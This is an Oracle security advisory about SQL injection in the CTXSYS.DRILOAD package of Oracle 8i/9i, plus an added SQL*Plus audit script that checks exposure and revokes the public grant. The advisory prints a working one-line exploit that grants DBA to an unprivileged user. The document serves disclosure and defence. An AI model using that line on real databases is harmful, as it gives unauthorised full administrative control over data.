SQL Injection via CTXSYS.DRILOAD in Oracle 8i/9i
Details

Any valid database user can become DBA (if CTXSYS is installed) by executing the package DRILOAD with a specially crafted parameter. Oracle 10g is NOT affected.

Workarounds

Drop the user CTXSYS (if not needed) or revoke the public grant from CTXSYS.DRILOAD.

Example

sqlplus scott/tiger@ora902 (or any other unprivileged user)

SQL> exec ctxsys.driload.validate_stmt('grant dba to scott');
BEGIN ctxsys.driload.validate_stmt('grant dba to scott'); END;

*
ERROR at line 1:
ORA-06510: PL/SQL: unhandled user-defined exception
ORA-06512: at "CTXSYS.DRILOAD", line 42
ORA-01003: no statement parsed
ORA-06512: at line 1

Patch Information

Please see MetaLink document ID 281189.1 for the patch download procedures and for the Patch Availability Matrix for this Oracle Security Alert. [metalink.oracle.com]

History

05-jan-2004 Oracle secalert was informed
06-jan-2004 Bug confirmed
31-aug-2004 Oracle published alert 68
25-apr-2005 Example and time to fix added

© 2005 by Red-Database-Security GmbH - last update 03-nov-2005
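The following SQL*Plus script is an added example, not part of the Red-Database-Security advisory. It shows how a DBA can check whether the exposure described above exists (CTXSYS present, EXECUTE on CTXSYS.DRILOAD granted to PUBLIC), look for DBA grants that should not be there, and apply the revoke workaround. It assumes a privileged session against an Oracle 8i/9i database and uses only the standard data dictionary views DBA_USERS, DBA_TAB_PRIVS and DBA_ROLE_PRIVS; the list of expected DBA holders (SYS, SYSTEM) is an assumption that must be adjusted to the site.

```sql
-- Added check-and-mitigation script (not from the Red-Database-Security advisory).
-- Run as a DBA in SQL*Plus against an Oracle 8i/9i database.

-- 1. Is the CTXSYS schema (Oracle Text) installed at all?
SELECT username, account_status
  FROM dba_users
 WHERE username = 'CTXSYS';

-- 2. Who can execute CTXSYS.DRILOAD? A row with GRANTEE = 'PUBLIC'
--    means every database user can reach the package.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'CTXSYS'
   AND table_name = 'DRILOAD';

-- 3. Detection: has DBA been granted to an account that should not hold it?
--    SYS and SYSTEM hold DBA by default; extend the exclusion list with the
--    administrators expected at your site (assumed list, adjust as needed).
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY grantee;

-- 4. Workaround from the advisory: remove the PUBLIC grant so that only
--    CTXSYS itself and explicitly trusted grantees can execute the package.
REVOKE EXECUTE ON ctxsys.driload FROM PUBLIC;

-- 5. Re-run check 2; no PUBLIC row should remain. If Oracle Text is not
--    used at all, the advisory's other option is to drop the schema:
--    DROP USER ctxsys CASCADE;
```

Check 3 is worth keeping as a recurring audit query rather than a one-off: an unexpected grantee of DBA is the visible result of this class of privilege escalation, whichever package was abused to obtain it.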